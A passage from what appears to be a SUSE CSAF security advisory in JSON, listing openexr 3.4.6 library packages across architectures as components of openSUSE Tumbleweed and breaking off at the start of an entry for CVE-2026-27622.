"name": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.x86_64",
"product_id": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"product": {
"name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"product_id": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "openexr-3.4.6-1.1.x86_64",
"product": {
"name": "openexr-3.4.6-1.1.x86_64",
"product_id": "openexr-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "openexr-devel-3.4.6-1.1.x86_64",
"product": {
"name": "openexr-devel-3.4.6-1.1.x86_64",
"product_id": "openexr-devel-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "openexr-doc-3.4.6-1.1.x86_64",
"product": {
"name": "openexr-doc-3.4.6-1.1.x86_64",
"product_id": "openexr-doc-3.4.6-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_4-33-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.aarch64"
},
"product_reference": "libIex-3_4-33-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_4-33-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.ppc64le"
},
"product_reference": "libIex-3_4-33-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_4-33-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.s390x"
},
"product_reference": "libIex-3_4-33-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_4-33-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.x86_64"
},
"product_reference": "libIex-3_4-33-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_4-33-32bit-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.aarch64"
},
"product_reference": "libIex-3_4-33-32bit-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_4-33-32bit-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.ppc64le"
},
"product_reference": "libIex-3_4-33-32bit-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_4-33-32bit-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.s390x"
},
"product_reference": "libIex-3_4-33-32bit-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_4-33-32bit-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.x86_64"
},
"product_reference": "libIex-3_4-33-32bit-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.aarch64"
},
"product_reference": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le"
},
"product_reference": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.s390x"
},
"product_reference": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.x86_64"
},
"product_reference": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_4-33-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.aarch64"
},
"product_reference": "libIlmThread-3_4-33-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_4-33-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.ppc64le"
},
"product_reference": "libIlmThread-3_4-33-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_4-33-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.s390x"
},
"product_reference": "libIlmThread-3_4-33-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_4-33-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.x86_64"
},
"product_reference": "libIlmThread-3_4-33-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_4-33-32bit-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.aarch64"
},
"product_reference": "libIlmThread-3_4-33-32bit-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_4-33-32bit-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.ppc64le"
},
"product_reference": "libIlmThread-3_4-33-32bit-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_4-33-32bit-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.s390x"
},
"product_reference": "libIlmThread-3_4-33-32bit-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_4-33-32bit-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.x86_64"
},
"product_reference": "libIlmThread-3_4-33-32bit-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.aarch64"
},
"product_reference": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le"
},
"product_reference": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.s390x"
},
"product_reference": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.x86_64"
},
"product_reference": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_4-33-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.aarch64"
},
"product_reference": "libOpenEXR-3_4-33-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_4-33-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.ppc64le"
},
"product_reference": "libOpenEXR-3_4-33-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_4-33-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.s390x"
},
"product_reference": "libOpenEXR-3_4-33-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_4-33-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.x86_64"
},
"product_reference": "libOpenEXR-3_4-33-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.aarch64"
},
"product_reference": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.ppc64le"
},
"product_reference": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.s390x"
},
"product_reference": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.x86_64"
},
"product_reference": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.aarch64"
},
"product_reference": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le"
},
"product_reference": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.s390x"
},
"product_reference": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.x86_64"
},
"product_reference": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_4-33-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.aarch64"
},
"product_reference": "libOpenEXRCore-3_4-33-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_4-33-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.ppc64le"
},
"product_reference": "libOpenEXRCore-3_4-33-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_4-33-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.s390x"
},
"product_reference": "libOpenEXRCore-3_4-33-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_4-33-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.x86_64"
},
"product_reference": "libOpenEXRCore-3_4-33-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.aarch64"
},
"product_reference": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.ppc64le"
},
"product_reference": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.s390x"
},
"product_reference": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.x86_64"
},
"product_reference": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.aarch64"
},
"product_reference": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le"
},
"product_reference": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.s390x"
},
"product_reference": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.x86_64"
},
"product_reference": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_4-33-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.aarch64"
},
"product_reference": "libOpenEXRUtil-3_4-33-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_4-33-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.ppc64le"
},
"product_reference": "libOpenEXRUtil-3_4-33-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_4-33-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.s390x"
},
"product_reference": "libOpenEXRUtil-3_4-33-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_4-33-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.x86_64"
},
"product_reference": "libOpenEXRUtil-3_4-33-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.aarch64"
},
"product_reference": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.ppc64le"
},
"product_reference": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.s390x"
},
"product_reference": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.x86_64"
},
"product_reference": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.aarch64"
},
"product_reference": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le"
},
"product_reference": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.s390x"
},
"product_reference": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.x86_64"
},
"product_reference": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:openexr-3.4.6-1.1.aarch64"
},
"product_reference": "openexr-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:openexr-3.4.6-1.1.ppc64le"
},
"product_reference": "openexr-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:openexr-3.4.6-1.1.s390x"
},
"product_reference": "openexr-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:openexr-3.4.6-1.1.x86_64"
},
"product_reference": "openexr-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.aarch64"
},
"product_reference": "openexr-devel-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.ppc64le"
},
"product_reference": "openexr-devel-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.s390x"
},
"product_reference": "openexr-devel-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.x86_64"
},
"product_reference": "openexr-devel-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-doc-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.aarch64"
},
"product_reference": "openexr-doc-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-doc-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.ppc64le"
},
"product_reference": "openexr-doc-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-doc-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.s390x"
},
"product_reference": "openexr-doc-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-doc-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.x86_64"
},
"product_reference": "openexr-doc-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-27622",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-27622"
}
],
"notes": [
{
"category": "general",
